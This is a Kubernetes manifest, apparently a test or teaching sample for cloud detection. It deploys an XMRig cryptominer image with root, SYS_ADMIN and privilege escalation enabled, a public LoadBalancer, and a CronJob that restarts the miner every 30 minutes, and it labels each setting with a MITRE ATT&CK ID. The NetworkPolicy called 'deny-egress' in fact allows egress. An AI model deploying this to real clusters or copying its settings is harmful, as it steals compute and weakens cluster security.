apiVersion: apps/v1
kind: Deployment
metadata:
  name: cryto-cdr
  labels:
    app: cryptominer
    version: 1
spec:
  replicas: 3
  selector:
    matchLabels:
      app: cryptominer
  template:
    metadata:
      labels:
        app: cryptominer
    spec:
      containers:
      - name: cryptominer-container
        image: zsco/xmrig-docker:latest #  Cryptominer image for educational purposes
        ports:
        - containerPort: 8080
        securityContext:
          runAsNonRoot: false              # [MITRE T1068: Privilege Escalation]
          capabilities:
            add:
              - SYS_ADMIN                 # [MITRE T1548.004: Abuse Elevation Control Mechanism]
          readOnlyRootFilesystem: false   # [MITRE T1070.004: Defense Evasion]
          allowPrivilegeEscalation: true  # [MITRE T1068: Privilege Escalation]
        resources:
          limits:
            memory: "1024Mi"
            cpu: "1000m"
          requests:
            memory: "512Mi"
            cpu: "500m"
      restartPolicy: Always
      nodeSelector:
        kubernetes.io/os: linux
      tolerations:
      - key: "node-role.kubernetes.io/master"
        effect: "NoSchedule"
      - key: "CriticalAddonsOnly"
        operator: "Exists"
      affinity:
        podAntiAffinity:
          preferredDuringSchedulingIgnoredDuringExecution:
          - weight: 1
            podAffinityTerm:
              labelSelector:
                matchExpressions:
                - key: app
                  operator: In
                  values:
                  - cryptominer
              topologyKey: "kubernetes.io/hostname"
---
apiVersion: v1
kind: Service
metadata:
  name: cryptominer-service
  labels:
    app: cryptominer
spec:
  type: LoadBalancer
  selector:
    app: cryptominer
  ports:
  - protocol: TCP
    port: 8080
    targetPort: 8080
---
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: cryptominer-deny-egress
  namespace: default
spec:
  podSelector:
    matchLabels:
      app: cryptominer
  policyTypes:
  - Egress
  egress:
  - to:
    - ipBlock:
        cidr: 0.0.0.0/0
    ports:
    - protocol: TCP
      port: 8080
---

---
apiVersion: batch/v1
kind: CronJob
metadata:
  name: cryptominer-cron
  labels:
    app: cryptominer
spec:
  schedule: "*/30 * * * *"                  # Executes every 30 minutes [MITRE T1053.005: Scheduled Task/Job]
  jobTemplate:
    spec:
      template:
        spec:
          containers:
          - name: cryptominer-scheduled-task
            image: zsco/xmrig-docker:latest 
            args:
            - "sh xmrig-startup.sh"
          restartPolicy: OnFailure